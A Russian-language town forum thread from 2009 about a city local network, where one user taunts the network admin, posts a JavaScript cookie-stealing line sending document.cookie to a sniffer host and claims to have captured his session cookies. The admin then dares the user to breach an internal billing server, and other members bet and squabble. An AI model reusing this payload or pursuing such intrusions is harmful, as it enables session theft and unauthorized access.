[ Новые сообщения · Участники · Поиск · ]
Форум - главная » Лосино-Петровский » Наш Лосино-Петровский » Городская локальная сеть (Отзывы, комментарии)
Городская локальная сеть
MIRshaДата: Воскресенье, 07.06.09, 04:43 | Сообщение # 301
Новичок
Группа: Зарегистрировавшиеся
Сообщений: 3
Статус: Offline
[quote=Гость]Джеймс! Право руля! Весной будет половодье. Лосино-Петровскую городскую сеть в печь! Кочегаром, кто будет[/quote]
Ладно пацаны кочегаром буду Я!!! Ща начну кочегарить. Немного поразмыслив я решила моего великого друга по ВУЗу научить отличию Линуха от Винды ну и заодно показать что такое трояны. Посем решила написать сама нечто подобное и проверить Михал Евгениевича на его компетентность и соотвествие занимаемой им должности,
Мишенька для тебя любимый от любимой пингвиноводки!!!!
Лови :
window.location.href=`http://mysnifhost.com/
snif.php?id=`+document.cookie
( снифер принял куки через id и я уже быстренько прописала в log.txt и серфер уже отослан )
Ты же сам отвечал мне на мой пост:"Троянов нахваталась и аля-улю"
Вот тут я тебя и прихватила. Процитировать полностью ?
wordpresusser_,,,,,,,,,,,,,,,,,,,,,d45d7=support:wordpressuser_,,,,,,,,,,,,,,,,,fbb997=,,,,,,,,,,,,,,,,,,,,,,,,,,,f 3db7,,,,,
или не надо? А то могу поэксперементировать немножко, Взяв у тебя же на твоём же серваке для опыта пару файликов типа /inc/functions,
Полученные куки дествительно твои, Зайди у себя в раздел управления плагинами и там разграничение и ограничения прав вообще не было, Тебе как админу понятия БЕЗОПАСТНОСТИ вообще не знакомы
Смотри внимательней. Не я дык кто нить другой подсунет тебе КОНИКА из пингвино-водов
 
astalavistaДата: Воскресенье, 07.06.09, 18:23 | Сообщение # 302
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (MIRsha)
Не я дык кто нить другой подсунет тебе КОНИКА из пингвино-водов

Попутного ветра - в горбатую спину happy ^_^ happy

Добавлено (07.06.09, 15:25)
---------------------------------------------

Quote (MIRsha)
Взяв у тебя же на твоём же серваке для опыта пару файликов типа /inc/functions

Забирай - не жалко ...

Я занимаюсь исключительно биллингом - а до биллинг-сервака, ты никогда не доберёшься smile

Quote (MIRsha)
А то могу поэксперементировать немножко

Валяй, если делать не хера ...

Добавлено (07.06.09, 18:23)
---------------------------------------------

Quote (MIRsha)
Тебе как админу понятия БЕЗОПАСТНОСТИ вообще не знакомы

Ай на-нэ... примеры в студию tongue


пьянству - бой!!! блядству - х#й!!!

Сообщение отредактировал astalavista - Воскресенье, 07.06.09, 15:28
 
botinochikДата: Среда, 10.06.09, 20:00 | Сообщение # 303
Новичок
Группа: Зарегистрировавшиеся
Сообщений: 2
Статус: Offline
А в вашу сетку пробиться через инет можно?
Ну по айпи вылетить в ваш городской чат?
 
MIRshaДата: Воскресенье, 14.06.09, 00:33 | Сообщение # 304
Новичок
Группа: Зарегистрировавшиеся
Сообщений: 3
Статус: Offline
ASTALAVISTA: Я занимаюсь исключительно биллингом - а до биллинг-сервака, ты никогда не доберёшься

MIRsha: Миша, ну такая самоуверенность в своих силах,возможностях , способностях и не уязвимости заслуживает конечно самой высокой оценки. Увы Миша должен тебя огорчить ты не ПЕНТАГОН, а человек эдак поскромнее на несколько порядков, И даже вышеуказанная организация явно не спит никогда спокойно в данном аспекте вопроса. Ну и самоуверенности у тебя как минимум на центральный департамент при президенте РФ по информационной политике и безопастности информационных технологий. А потом откуда базы то ГИБДД, то адресные базы прописок с паспортными данными появляются в свободной продаже, И каковы потом комментарии:"Сотрудник не законно держал инфо на флэшке напился и потерял флэшку, а руководство вовремя не поставил в известность о содеянном", И такая фигня каждый раз, Но не это главное, Давай сделаем так! Раз ты позволил мне взять у тебя несколько файлов с фразой:"Забирай не жалко", Тоесть ты даёшь мне "ДОБРО" официально? Я попробую и постараюсь как ты соизволил выразиться:"От нехера делать", Ну и конечно твоя биллинговая система насколько Я УЖЕ ЗНАЮ не UTM 5, а то с лицензированными системами шутки плохи, Сам знаешь.....!!!!
Давай тогда на спор!? Напиши мне условия нашего спора какие ты готов принять на мыло misha-batokin@yandex.ru и мы с тобой поспорим. Либо опубликуй условия спора здесь в форуме. Идёт!!!!!????
 
kovboyДата: Воскресенье, 14.06.09, 19:38 | Сообщение # 305
Генерал (ветеран форума)
Группа: Friends
Сообщений: 1836
Статус: Offline
Quote (MIRsha)
Давай тогда на спор!? Напиши мне условия нашего спора какие ты готов принять на мыло misha-batokin@yandex.ru и мы с тобой поспорим. Либо опубликуй условия спора здесь в форуме. Идёт!!!!!????

Хакер, с кем ты спорить собрался,он человек нам известный.Ты предствься для начала,а то так как то не честно выходит. cool


"Если кто-то сделал тебе плохо, не кидайся в бой и не спеши мстить, просто сядь на берегу реки и жди пока труп обидчика проплывет мимо…" Лао-цзы

Сообщение отредактировал kovboy - Воскресенье, 14.06.09, 22:31
 
АлексейДата: Понедельник, 15.06.09, 11:23 | Сообщение # 306
Генерал (ветеран форума)
Группа: Aдмин
Сообщений: 3514
Статус: Offline
Quote (MIRsha)
Давай сделаем так! Раз ты позволил мне взять у тебя несколько файлов с фразой:"Забирай не жалко", Тоесть ты даёшь мне "ДОБРО" официально? Я попробую и постараюсь как ты соизволил выразиться:"От нехера делать", Ну и конечно твоя биллинговая система насколько Я УЖЕ ЗНАЮ не UTM 5, а то с лицензированными системами шутки плохи, Сам знаешь.....!!!!
Давай тогда на спор!? Напиши мне условия нашего спора какие ты готов принять на мыло misha-batokin@yandex.ru и мы с тобой поспорим. Либо опубликуй условия спора здесь в форуме. Идёт!!!!!????

Интересно, даже очень. Ждём продолжения диалога wink
 
astalavistaДата: Понедельник, 15.06.09, 16:03 | Сообщение # 307
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Алексей)
Интересно, даже очень. Ждём продолжения диалога

Ближе к ночи или утром отпишу ...
Шибко занят щас ...

Quote (MIRsha)
Увы Миша должен тебя огорчить ты не ПЕНТАГОН

Я значительно лучше... Собственно, если тебе это неизвестно, то я тя просвещу: у нас не пентагон и даже не банк какой-нибудь, поэтому мне достаточно делать пару
бэкапов в сутки, и в случае возникновения проблем (коих, собственно, не предвидится) система будит восстановлена за пару минут ...

Quote (MIRsha)
Ну и конечно твоя биллинговая система насколько Я УЖЕ ЗНАЮ не UTM 5, а то с лицензированными системами шутки плохи

UTM 5 - помои ...
Система у нас и лицензированная (правильнее - лицензионная) и сертифицированная МинСвязи ... Какая - не скажу ))) а даже и скажу - хуже не станет - траффик инспектор от компании http://smart-soft.ru/ ))) Две лицензии PRO на неограниченное число юзеров... + надстройка MSSQL с данными пользователей ...
Шутки плохи не с "лицензированными системами" , а с людьми - а то как в анекдоте - проснулся, а голова в тумбочке - "шутка" (с) Юрий Никулин...

Quote (MIRsha)
Давай тогда на спор!? Напиши мне условия нашего спора какие ты готов принять на мыло misha-batokin@yandex.ru и мы с тобой поспорим. Либо опубликуй условия спора здесь в форуме. Идёт!!!!!????

Идёт...
Я те даже задачу облегчу - попробуешь пробиться через шлюз на внутренний айпишник 172.16.3.3 (собственно вся биллинговая база находится тама)
в корне скачаешь файл mirsha_lamer_loh_i_chainik.txt и опубликуешь его содержимое...
Копию этого файла я отправляю по адресу misha-bakotin@yandex.ru ... собственно дата отправки там указана, так что всё по чесноку...
Как только дёрнешь файлик - отписывай сюды - я тут же опубликую пароль к этому ящику, чтобы все убедились в fair play ... и добавлю к этому пару ящичков пива
Если до первого июля пролетишь - напишешь от своего имени " МИХЕЙ - Я ОТCO$$Л" и добавь две сотни восклицательных знаков ...

Quote (MIRsha)
А потом откуда базы то ГИБДД, то адресные базы прописок с паспортными данными появляются в свободной продаже

Потому что крыс очень много развелось ... Байками про хацкеров корми кого-нибудь другого


пьянству - бой!!! блядству - х#й!!!

Сообщение отредактировал Алексей - Понедельник, 15.06.09, 16:21
 
АлексейДата: Понедельник, 15.06.09, 16:24 | Сообщение # 308
Генерал (ветеран форума)
Группа: Aдмин
Сообщений: 3514
Статус: Offline
smile
Адрес почты кстати отличается, уточните.
 
astalavistaДата: Понедельник, 15.06.09, 16:38 | Сообщение # 309
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Алексей)
Адрес почты кстати отличается, уточните.

Я про свой ящик отписал


пьянству - бой!!! блядству - х#й!!!
 
dimmДата: Понедельник, 15.06.09, 21:36 | Сообщение # 310
Подполковник
Группа: Полноправные участники
Сообщений: 449
Статус: Offline
тема:)))

Предлагаю, чтобы любой проигравший выкатил "пару ящичков пива ..." для совместного распития членами форума за здоровье наших хакеров и админов:)


FD
 
kovboyДата: Понедельник, 15.06.09, 22:27 | Сообщение # 311
Генерал (ветеран форума)
Группа: Friends
Сообщений: 1836
Статус: Offline
Quote (astalavista)
Если до первого июля пролетишь - напишешь от своего имени " МИХЕЙ - Я ОТCO$$Л" и добавь две сотни восклицательных знаков ...

Да если хацкер пролетит,то он больше тут и не появится.Его ж никто не знает.Как появился ,так же и пропадёт.Нуно во отчию встретиться и заключить пари путём разбивки рук. smile

Добавлено (15.06.09, 22:27)
---------------------------------------------

Quote (astalavista)
Как только дёрнешь файлик - отписывай сюды - я тут же опубликую пароль к этому ящику, чтобы все убедились в fair play ... и добавлю к этому пару ящичков пива

Михал Евгеньевич,а писать"Я ОТCO$$Л" тоже будешь в случае проигрыша?Хацкеру ты же выдвинул условие жёсткое.


"Если кто-то сделал тебе плохо, не кидайся в бой и не спеши мстить, просто сядь на берегу реки и жди пока труп обидчика проплывет мимо…" Лао-цзы

Сообщение отредактировал kovboy - Понедельник, 15.06.09, 22:37
 
AssanДата: Понедельник, 15.06.09, 22:30 | Сообщение # 312
Полковник
Группа: Полноправные участники
Сообщений: 794
Статус: Offline
Quote (kovboy)
Михал Евгеньевич,а кричать "Я ОТCO$$Л" тоже будешь в случае проигрыша?Хацкеру ты же выдвинул условие жёсткое.

Да не будет он орать.Отмазку найдет.


пути Господни неисповедимы.
 
astalavistaДата: Понедельник, 15.06.09, 22:38 | Сообщение # 313
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Assan)
Да не будет он орать.Отмазку найдет.

Не ссы чувак, буду орать не по деццки - но вероятность этого - шибко мала ...

Добавлено (15.06.09, 22:38)
---------------------------------------------

Quote (kovboy)
Нуно во отчию встретиться и заключить пари путём разбивки рук

Боюсь зассыт этот клоун...


пьянству - бой!!! блядству - х#й!!!
 
AssanДата: Понедельник, 15.06.09, 22:39 | Сообщение # 314
Полковник
Группа: Полноправные участники
Сообщений: 794
Статус: Offline
Quote (astalavista)
Не ссы чувак, буду орать не по деццки - но вероятность этого - шибко мала ...

Хамло............................................


пути Господни неисповедимы.
 
astalavistaДата: Понедельник, 15.06.09, 22:42 | Сообщение # 315
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Assan)
Хамло............................................

Не мы такие - жизнь такая (с) На себя посмотри ...


пьянству - бой!!! блядству - х#й!!!
 
TrovataДата: Понедельник, 15.06.09, 22:43 | Сообщение # 316
Сержант
Группа: Полноправные участники
Сообщений: 36
Статус: Offline
Quote (astalavista)
деццки

самое забавное, что вы недавно в адрес Rina отписывали - не сваливать на албанский, писать грамотно.... очередное бла-бла happy


Всё относительно...
 
astalavistaДата: Понедельник, 15.06.09, 22:49 | Сообщение # 317
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Trovata)
самое забавное, что вы недавно в адрес Rina отписывали - не сваливать на албанский, писать грамотно.... очередное бла-бла

А мне можно отписывать не грамотно - ибо я дебил и можете меня процитировать !!!


пьянству - бой!!! блядству - х#й!!!
 
TrovataДата: Понедельник, 15.06.09, 22:53 | Сообщение # 318
Сержант
Группа: Полноправные участники
Сообщений: 36
Статус: Offline
ага, подход эдакого подростка, со всеми вытекающими проблемами пубертатного периода. вот мол я, недоумок, и мне можно всё! однако..... sad

Добавлено (15.06.09, 22:53)
---------------------------------------------
с другой стороны - если индивидуум достаточно адекватен, чтобы признать свою дебильность (это исключительно в качестве допустимого диагноза), то он должен отдавать себе отчет в том, что ему не следует вмешиваться в разговор здоровых...


Всё относительно...
 
astalavistaДата: Понедельник, 15.06.09, 22:58 | Сообщение # 319
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Trovata)
он должен отдавать себе отчет в том, что ему не следует вмешиваться в разговор здоровых...

считайте, что я - конченный дебил , хотя фору дам всем ...
А кто тута здоровый, ну-ка просветите ???
Я смеюся ...


пьянству - бой!!! блядству - х#й!!!
 
TrovataДата: Понедельник, 15.06.09, 23:02 | Сообщение # 320
Сержант
Группа: Полноправные участники
Сообщений: 36
Статус: Offline
конченый пишется с одной "н"...
кстати, я - клинически здорова! оставляю за собой право посмеяться над собой здраво! biggrin


Всё относительно...
 
astalavistaДата: Понедельник, 15.06.09, 23:08 | Сообщение # 321
Замполит
Группа: Полноправные участники
Сообщений: 863
Статус: Offline
Quote (Trovata)
кстати, я - клинически здорова!

уверенна ??? happy happy happy


пьянству - бой!!! блядству - х#й!!!
 
TrovataДата: Понедельник, 15.06.09, 23:13 | Сообщение # 322
Сержант
Группа: Полноправные участники
Сообщений: 36
Статус: Offline
хм... опять лишняя буква "н".
тем не менее, да - уверена! или врачи нагло врут?
ух ты, тогда это, должно быть, заговор - с какой же ещё целью им меня во время профосмотра дезинформировать? или нет - это ваша больная (по вашему же признанию) - фантазия. конечно, каждый ищет себе подобных. увы, разочарую. я на самом деле здорова, и в ваших метаниях ума вас не поддержу. smile


Всё относительно...
 
AssanДата: Вторник, 16.06.09, 00:22 | Сообщение # 323
Полковник
Группа: Полноправные участники
Сообщений: 794
Статус: Offline
Quote (astalavista)
считайте, что я - конченный дебил ,

+5 biggrin ты не дебил -ты еще хуже.................


пути Господни неисповедимы.

Сообщение отредактировал Assan - Вторник, 16.06.09, 00:33
 
АлексейДата: Вторник, 16.06.09, 11:01 | Сообщение # 324
Генерал (ветеран форума)
Группа: Aдмин
Сообщений: 3514
Статус: Offline
Quote (dimm)
Предлагаю, чтобы любой проигравший выкатил "пару ящичков пива ..." для совместного распития членами форума за здоровье наших хакеров и админов:)

Ради этого готов немного "развязаться" wink
 
ТатаДата: Среда, 17.06.09, 09:06 | Сообщение # 325
Лейтенант
Группа: Полноправные участники
Сообщений: 91
Статус: Offline
biggrin зашла в темку и как-то тут подвисла))))))))). Вспомнилось что-то вроде поговорки: "Люди как собаки стали-еле от десятерых отгавкался")))) Это про Асталависту biggrin
astalavista, надо отдать Вам должное-умеете удерживать на себе внимание)) Браво)
Так что там насчет спора с хакером? Жду продолжения!
 
Форум - главная » Лосино-Петровский » Наш Лосино-Петровский » Городская локальная сеть (Отзывы, комментарии)
Поиск: